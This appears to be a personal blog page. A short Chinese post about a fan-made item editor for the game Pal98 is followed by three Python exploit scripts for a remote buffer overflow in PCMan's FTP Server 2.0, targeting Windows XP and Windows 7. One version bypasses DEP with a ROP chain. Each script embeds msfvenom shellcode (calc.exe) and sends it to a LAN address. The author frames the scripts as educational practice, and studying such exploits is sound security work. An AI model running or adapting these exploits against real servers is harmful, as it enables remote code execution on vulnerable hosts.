Just another Pepsi
仙劍奇俠傳是我接觸到的第二款電腦遊戲(第一款是德軍總部),
那時候都還只有DOS系統家裡也沒有電腦,都是去鄰居家玩。
後來仙劍公司釋出仙劍一可以讓玩家在電腦上玩 (有興趣的人可以到這看看: https://steachs.com/archives/1975 )。
老實說我很少玩遊戲,也沒玩過其他仙劍版本。但一直很喜歡仙劍一。
寫了一個物品修改器,可以在一開始就刷出”無塵劍”,和”金蠶王”等後期裝備。
希望大家會喜歡
# 情懷 # 是個念舊的人
Copy and run Pal98_editor.exe to the same folder as your Pal98 game folder.
You could download Pal98 at https://steachs.com/archives/1975
GitHub: https://github.com/ChakoMoonFish/Pal98_editor
Bypass DEP ( Data Execution Prevention) with ROP (Return-oriented programming )
#!/usr/bin/python
#
#
###################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit (DEP)
# Date: 2019/10/10
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows XP SP3 English
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBP 00A31C50
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
import struct
USER = "anonymous"
PASSWD = "TEST"
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x77c2fb30, # POP ECX # RETN [msvcrt.dll]
0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
0x77c11120, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x7e41927f, # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]
0x763cc3d8, # XCHG EAX,ESI # RETN [comdlg32.dll]
0x77c244c6, # POP EBP # RETN [msvcrt.dll]
0x74e331a9, # & jmp esp [RICHED20.dll]
0x7c880176, # POP EAX # RETN [kernel32.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x77e8c784, # NEG EAX # RETN [RPCRT4.dll]
0x7c9059c8, # XCHG EAX,EBX # RETN [ntdll.dll]
0x77c4ded4, # POP EAX # RETN [msvcrt.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x71a7c15c, # NEG EAX # RETN [mswsock.dll] ######
0x7c8409d4, # XCHG EAX,EDX # RETN [kernel32.dll]
0x77c3ea01, # POP ECX # RETN [msvcrt.dll]
0x74e9121e, # &Writable location [RICHED20.dll]
0x77c3aeca, # POP EDI # RETN [msvcrt.dll]
0x74e46463, # RETN (ROP NOP) [RICHED20.dll]
0x77c21d16, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x77e160c7, # PUSHAD # RETN [ADVAPI32.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
rop_chain = rop_chain.replace('\x00','')
#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE = b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"
JUNK = "\x41" * 2010
EIP = "\x10\xB3\x45\x7E" # 7E45B310 JMP ESP USER32.DLL
NOP = "\x90" * 4
PADDING = "\x43" * (3000 - len(JUNK) - len(rop_chain) - len(NOP) - len(SHELLCODE))
print len(PADDING)
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.80",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
#s.send(JUNK + EIP + NOP + SHELLCODE + PADDING + '\r\n')
#s.send(JUNK + "\x44\x44\x44\x44"+rop_chain + NOP + SHELLCODE + PADDING + '\r\n')
s.send(JUNK + rop_chain + NOP + SHELLCODE + PADDING + '\r\n')
s.close()
print("[!] Done! Exploit successfully sent\n")
Found this vulnerability years ago and now I just kinda rewrite the exploit for education and practice purpose .
#!/usr/bin/python
#
#
###################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2019/10/08
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows XP SP3 English
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBP 00A31C50
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
# Address=7E45B310
# Message= 0x7e45b310 : jmp esp | {PAGE_EXECUTE_READ}
# [USER32.dll] ASLR: False, Rebase: False, # # SafeSEH: True, OS: True,
# v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) (C:#WINDOWS\system32\USER32.dll)
JUNK = "\x41" * 2011
EIP = "\x10\xB3\x45\x7E" # 7E45B310 JMP ESP USER32.DLL
NOP = "\x90" * 10
#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE = b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.80",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
s.send(JUNK + EIP + NOP + SHELLCODE +'\r\n')
s.close()
print("[!] Done! Exploit successfully sent\n")
Win7 x32 SP1
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2019/10/08
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP 1 English
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
JUNK = "\x41" * 2011
EIP = "\x5B\x4E\x1C\x76" # 761C4E5B JMP ESP USER32.DLL
NOP = "\x90" * 10
#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE = b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.85",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
s.send(JUNK + EIP + NOP + SHELLCODE +'\r\n')
s.close()
print("[!] Done! Exploit successfully sent\n")